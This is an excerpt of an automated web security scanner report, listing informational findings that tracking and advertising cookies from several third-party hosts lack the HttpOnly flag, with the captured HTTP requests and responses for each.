Cookie: UTID=f3b4b703c00b47eb93300bd230973543; UTPROFILES=15174%23288%3A6%2C2%7C1022%3A6%2C2%7C1023%3A6%2C2%7C1671%3A7; A28X=3sctnLo1Ii2YRYsbSAhSEkGPDnyiF-Kjl82XJIrWXTxZ7EhcgAcQ0cA; UTLIA=223791.lockef-13588

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Vary: Accept-Encoding
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:42:55 GMT
Connection: close
Set-Cookie: _UTLIA[174266]=lolljj-16565; expires=Thu, 18-Aug-2011 20:42:55 GMT; path=/
Set-Cookie: _UTCBLOCK[28159]=1311108175; expires=Thu, 18-Aug-2011 20:42:55 GMT; path=/
Set-Cookie: _UTSCCAP[28159]=2; path=/
Set-Cookie: UTID=f3b4b703c00b47eb93300bd230973543; expires=Wed, 18-Jul-2012 20:42:55 GMT; path=/

GIF89a.............!.......,...........D..;

14.29. http://api.choicestream.com/instr/api/8e360375d27a5381/a1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.choicestream.com
Path:   /instr/api/8e360375d27a5381/a1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /instr/api/8e360375d27a5381/a1?protocol=ScriptInclude&callback=csAny.Transport.callback&request_id=0&json_id=a0b60e38bae29543e86fa96644275bba&json=%7B%22discoveries%22%3A%5B%5D%2C%0A%22activities%22%3A%5B%7B%22type%22%3A%22item_views%22%2C%0A%22attrs%22%3A%7B%22item_id%22%3A%22event_000043582C516D43%22%7D%7D%5D%2C%0A%22get_recos%22%3A%5B%5D%2C%0A%22context%22%3A%7B%22appcontext%22%3A%22tm_event_on_sale%22%2C%0A%22api_key%22%3A%228e360375d27a5381%22%2C%0A%22cookie_id%22%3A%2223fe7a5564101842925261f744f3ff01%22%7D%2C%0A%22transport%22%3A%7B%22endpoint%22%3A%22http%3A%2F%2Fapi.choicestream.com%2Finstr%2Fapi%22%7D%2C%0A%22__cs_rr%22%3A%221%22%7D&_=1311100563081 HTTP/1.1
Host: api.choicestream.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 466791c2-9f94-48c8-8658-3ff00fec0bac
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
Last-Modified: Tue, 19 Jul 2011 18:36:30 GMT
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 81
Cache-Control: private
Content-Length: 81
Date: Tue, 19 Jul 2011 18:36:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: __cs_sp=1; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/
Set-Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/

csAny.Transport.callback('0',{"status":{"message":"OK","code":0},"reco_sets":[]})

14.30. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=38081733&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.factset.com%252Fproducts%252Fim%26jsref%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%26rnd%3D1311085610127&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fim&jsref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&rnd=1311085610127
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 19 Jul 2011 14:26:45 GMT
Connection: close
Set-Cookie: UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 14:26:45 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


14.31. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:49:01 GMT
Connection: close
Set-Cookie: UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 20:49:01 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

14.32. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3005403&d.c=gif&d.o=nytbglobe&d.x=138794305&d.t=page&d.u=http%3A%2F%2Fboston.com%2F&d.r=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:43:27 GMT
Connection: close
Set-Cookie: UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 20:43:27 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

14.33. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/minorcat/1/11408426983@x02

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/ticketmaster/minorcat/1/11408426983@x02? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFM=011QjF9J810JLQ|U10MCo|U10QMP|010TqE; expires=Fri, 19-Jul-13 18:36:05 GMT; path=/; domain=.mookie1.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 9
Content-Type: text/html

<!-- -->

14.34. http://bcp.crwdcntrl.net/4/c=520|rand=478684930|pv=y|rt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=520|rand=478684930|pv=y|rt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=520|rand=478684930|pv=y|rt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAID=d11e854ef21d94a451e67c6f9709b415; OACECAP=4150.2; OACAP=13607.1_13606.1; _OACAP[13606]=1; OAAECAP=13607.2; _OAAECAP[13607]=1; _OAAEBLOCK[13607]=1297260544; _OACEBLOCK[4150]=1297260544; _OACECAP[4150]=1; aud=ABR4nC2SSyhEYRiGf2FmmuZy5phzjtiJPcqalQUaSbluKBZ2bhmzGxsWLhsbYeGSkrKTcomowaRsTMpaWE4piSjjfcziPL3%2F%2F37v9%2F1fY4wxCbdzxJiiOn9DLmaSxlhV5u%2FntgqRD1SbYNUIoXvuvrhr4vBRCOeE4D6WV8Fr53BHcAZR20L0h8MBoSyQNunC3bpUnLbBFVJGafRJ2yGQEmJ%2B1dm1WPJS7jgjfeOk3J0SSitwLmOZE%2ByE6iwsVpK2IdQYszyR4uGclvKFcTaSMqy76BJ1%2F6tLANZqT6C6UZOUs12rh%2Bg%2BVD%2FreRfMIgWzdEgJzjOWF5BnIew60itLbJWFMHygXojfCdFmMjco6EKdE33Fa9%2BIzlD3gLpk5cc4bzjMUp7l7pa2aVJmsBwyfDVz8jDnSAgXo8i0M0SfAkZy53FW4twEW7oLRVC79FtjZyykvIPX%2BnimgyphydeCd8bwLNI7IeWAfg1EL6iRt0dmixDk7x27KHx%2BAe2OYQY%3D; cc=ACN4nK2UTyiDYRzHn3cUKextUdPYMA4ceNm7eeO8wyY2yoUYtknJHBRRLMJBOSh%2Fym25yJKDOBgrufgbUgrluovb2o6v9zWkRd%2FfYe%2FleZ%2Ff%2B3m%2B3%2B%2F7%2FGMmryD4mkSLz98geCVLv0UUfFbboNUv2eqlAYsgMuVpK%2B4clltaRxjjhBzxkVdrTKdNHGczdsOYrHb1qZZrWtmWOeUlrrRqP8gOtYkoFYyQwLA2cUhVPKKBfPkozZo3C0RF%2FRoV3KCC69S%2FfqSBusJlquIdFXyggpc00Dg6R1U8o4GeyRnaWnsmZ2kgs%2FHJLRVVS1wayn2hHPNPuTDkjPf%2BNk0V0yE%2BuYaVDPI5Vup%2BT2KoJlKFIYN8haGu6zEcnE8uYqgmYsJ2pdb73C9IKVYorfKRGwt%2Btillpb%2Ba6qcP1uR%2B1jXqQE7vNvdgv7K6CQy58k%2F%2FD%2FUd5ifc36HUgc74OGXpDBhyh7IyksgUnackKsJQ3mwwUwtnb77Ffu2BEwyZoksYcsaHCPtEOMCQrlqi2AUoSiIFasSQh7kx1DGt%2BX1%2B%2F5vxPXzIPcyF7Up2Gghrt19IuQzDGLI3hyj76YWitIuhvuxjDPVLt3gyjZsFGGoPXFAyRQiXirkEQ763UpzJEXvC%2BylvYTVzV30lTu6IveJQBjlKmahait0LtnPEnjH0AUX9WyY%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:30 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: image/gif
Set-Cookie: aud=ABR4nCXPPwsBcRjA8UeKS%2B6cv6dsdC%2BA8g5kMJyVjbeAxXaTBbtsbvQCDBKy2CwmszIppUxSrud7y6fn%2BT3%2FTkTEc59DkUi1UQm%2BUhexy774YX6uJK9KZkJ0U1JjJd8n%2BhH1lKyhWF0lvVQKd8WoKYmFkrvQ3qTkTUOcYSeSA9a%2BSG4o%2BShmlOQWdnDgXI%2F2KZUl3lYQMNPiFi4rOKIfi2Im%2F5BXnL1inxn94IgO0RBGVLpU8mbW2TfjbU3fUSm22N4O%2BQPE21a7; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:43:31 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSDE0TLUwNUlNMzJMsTRJNDE1TDUzTzZLszQ3sEwyMTRlAAI%2F1TfF%2F3U2JzEwMBq6KC%2F6DRJjYPffVcTIwMTBwPCfESgBRP67SlAFEiqq0AVq0AWy0AWmoAu0oQoweAh%2Bn83CwHC2geE%2FSEByb%2FF%2FoHMYLYB8RiD%2FC0Q8rSqAsCLvL3EgRRBJBkmIILoiwe9TCZsk8%2F8IYZOi334nrEhrjyphRTL%2FTxNWFHamgLDDBb%2B3EVaktUeBsHWBKjGEFcmaXeSAKgIKKgFpoCRjAVSRJESccRKEj64ZkgwYmYAaGRgl5fTLCdsXwLsPt30we%2BD2YrcPpNH7SwkxUSdDRDAtYqaKixT2NxPjIlHCirjqG6gVJ27W5wjbp7C%2FnbAi%2F%2Fy9hBV5f0knrEjOcAthRcJqlsRYl0%2BMSabEKDImrCiBIZCwoqBqJuT8iysw1xHO5AkMAYStk1ppREQEb%2BAnrMjNehExJeYaYpLKbWKsW01YUTzLbsKKEi3PEQ5M%2BRl8hBX5558kpliVIsbhewgrSr0vS9hNXi%2BuE05PXK2TqFViBKooE3a514s7hB0l838%2FMaGpTYx1twlb5%2FXiFmFFygIORGSX9f%2BJSeTPiPGdAWFFaWpEtIzcrOcTNomv4i21koF%2F%2FgvC9iWdPEVMkZFKWJFiKhGpLj42mrAi7dMqRJQGmRbEWBdBjKJ4woqS%2FYgoDQA8OiC4; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:43:31 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 49
Connection: close

GIF89a...................!.......,...........T..;

14.35. http://bcp.crwdcntrl.net/4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwk2bdw8DAaCjZl8nFoMPAIKDUwNAAFO8FUzyXwZTgVzDFywymRHdBqD0QJTchvP1gSqwbolIaTPFXQuQWQnhVEA18YIrrMUSDOAMIiCZClPyFaEiAOOI9mGLjhaiEaOAwgmifAab4RMGUyDkwJb4PTAkcB1NCzyBmukH8EAERLIYY9gli0SGIYAnEZRD7xIoghqlCvGIK4a2CmHIATEl4QRzhD6QAq%2BdH4Q%3D%3D; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2FadY9%2F%2FesTmdgYDSU7MvkAokxcPjvKmJkYOJgYPjPCJRgYDD331WCKiDwbTeKgGlCRRWqioSKGnSBLHSBKegCbagCDCGC32czMzAoPTb8zwgUOAukQRKSr7%2F%2BB6tQCjuTzQIUB%2FOB4g0MIHlGCyANUv8Fwg9UcWKGK2K0RJXU2mOKWzKtKgBkPIQDtRbD%2BLAzFbhNkPl%2FBJ%2FkaWJcH43bhLAzBTAHMuB0oP%2BuAsLWaO1RwG2N4Pc2Zrg16JKBKjGEjZc1u8gOUvQNHJJKQBooCTdJEiKO0NTTCqIhaQEkoCSnX47beQG8%2Bygy3PtLCb4EIoNbMnARM0U2a%2B2RwG24wv5mfM4SJRzqXPUNFDnPzfoccvaDWQbOhiB5%2F%2Fy9eOUV9rfj9oGb9Vnckt5f0vFJpuGWlDPcgltSWM0Sr4O9v%2BTjlRdWw1NaBFUzYcslwFAF8hWTvxOOL%2F%2F8dYSzs8L%2BN3gKBOEMPAlqAz9hN7hZL8QXZ4twS4b2zMSnczU%2BV1filvTPP0qMq7fjM%2BEwbsl4lt34HFaAWzLR8hzh2kF%2BBh%2FhKA1UkcKb7OJZ9hAOgjDVSsKKUu%2FLEnazwiU84eX14jqyCejWQFI7V%2BskigqeQBUlPIWuijJuScVldYRDQeb%2FfmIqXm28keL14gbu7O714hZuSWUBB3yJ9RmeHLz%2BPzEON8DTpFEjokmjsP8abhP4Kt5SFLf%2B%2BS%2FwRN%2Bsm4Q9mHTyFGFF0W9T8ViTqkzYhPhYPC0v7dMqhPO1fKYF%2Fvrx%2F048BVNsPJ6E8H8rbkkA0QuBNw%3D%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:41 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Set-Cookie: aud=ABR4nGNgYGDwU32xl4GB0dBFVGUdgzUDg4ASAxj0gkmeyxDqJpjir2xgaGBgYF4D4VWBeaKJYJ5oAkTwL5jiMAJTYo%2FBFNcMsErxAjBP5BxEpRuY4guDqPwEpni%2FQXiVEDMPgfXx%2FoE44j2YJ1YE5rFKgSnBrxCVOyHamSG8XRCX7YFo6IQI7ofwuiEqpSGCCyFG84EpgUKIcyGuFhMHaxC6BgkQiO1svGCOxH0IFQimJJ0glCPER6JgSnwfxMzjYEroGYQqhhi9BcIrgahUhXjTFMJbBfHYAbCghBfESf5AAgAIDzOP; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:41 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rd7%2F288kcbAwGjoIqqyDiTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIFZIqLDEJScj%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAJO5PNwsBwdm8TWFayAagKKG0BpBmBCr5A%2BILfZzMzMCht2QcWPAukQSZI%2Fv8P1ARkKAWqODHDDWG0RNWstccUt2RaVQDIeggHaiKG9WFnKnCbIPP%2FCD7J04R957%2BrgLCisDMFMIcy4HRooEo0vnBQwC0p%2BL2NGW48umSgSgxhB8qaXeQAKWoGh6QSkAZKwk0CRz%2BaJiDNxHFxGpgPThaMwHSiBGTL6ZfjdmkA7z5q2eP9pQRfcMnglgxcxEwtR2jtkcBtj8L%2BZnwuFCUcLVz1DdRyqZv1OeRcCLMXnBtBZivsb8ftWP%2F8vXg1u1mfxa3Z%2B0s6Psk03JJyhltwSwqrWeJ1k7AanpLD%2B0s%2BXs05J2cCA9IUmFGBXMXk74SjKqiaCVceZACG3zrC%2BT9MOANfWnqDR3IDP2EHulkvxG2Cm%2FUi3JKhPTPx6VyNWzJMuBJfojpKjKu34zPhMG7JeJbd%2BBxWgFsy0fIc4WpFfgYfMUW6FN5kFs%2Byh4jKQ7WSsKLU%2B7KE3axwCU94eb24jmwCNmsYGLhaJ1GrQApUUcJTRKso45ZUXFZHOEBk%2Fu8nrChQRRtv%2FHi9uIE7U3u9uIVbUlnAAV%2B6fYYnM6%2F%2FT4zDDfA0i9SIaBYp7L%2BG2wS%2BirfUimb%2F%2FBd4YnLWTcJ%2BBQAr6yeC; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:41 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 643
Connection: close

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><!-- Begin comScore Tag --> <script>
...[SNIP]...

14.36. http://bcp.crwdcntrl.net/4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=aa8272d1805895ab786afc266fb574e9; aud=ABR4nGNgYGDwU30Ry8DAaOgivDqIwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPp4%2F0Ac8R7MEysC81ilwJTgV4jKnRDtzBDeLojL9kA0dEIE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQrxpCuGtgnjsAFhQwgviJH8gAQCsIzNY; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rex%2FzeeOMbAwGjoIrw6CCTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIGZOqLDEJcco%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAJO5PNwsBwdm8zWFayAagKKG0BpBmBCr5A%2BILfZzMzMCht2Q8WPAukQSZAjAQylAJVnJjhhjBaomrW2mOKWzKtKgBkPYQDcyS69WFnKnCbIPP%2FCD7J04R957%2BrgLCisDMFMIcy4HRooEo0vnBQwC0p%2BL2NGW48umSgSgxhB8qaXeQAKWoBh6QSkAZKwk0COxhNE5Bm4rg4HcwHJwtGYDpRArLl9MtxuzSAdx%2B17PH%2BUoIvuGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHIuhNkLzo0gsxX2t%2BN2rH%2F%2BXrya3azP4tbs%2FSUdn2Qabkk5wy24JYXVLPG6SVgNT8nh%2FSUfr%2BackzOBAWkKDkAGxeTvhKMqqJoJVx5kAIbfOsL5P0w4A19aeoNHcgM%2FYQe6WS%2FEbYKb9SLckqE9M%2FHpXI1bMky4El%2BiOkqMq7fjM%2BEwbsl4lt34HFaAWzLR8hzhakV%2BBh8xRboU3mQWz7KHiMpDtZKwotT7soTdrHAJT3h5vbiObAI2axgYuFonUatAClRRwlNEqyjjllRcVkc4QGT%2B7yesKFBFG2%2F8eL24gTtTe724hVtSWcABX7p9hiczr%2F9PjMMN8DSL1IhoFinsv4bbBL6Kt9SKZv%2F8F3hictZNwn4FAEhKFMU%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:50 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Set-Cookie: aud=ABR4nGNgYGDwU33RxcDAaOgiEredwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPrEiiCOeA%2Fm8f4B81ilwJTgV4jKnRDtzBDeLojL9kC0d0IE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQjxmCvHRAUhgrYK4xR9ikReQAAAfMjOe; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:50 GMT; Path=/
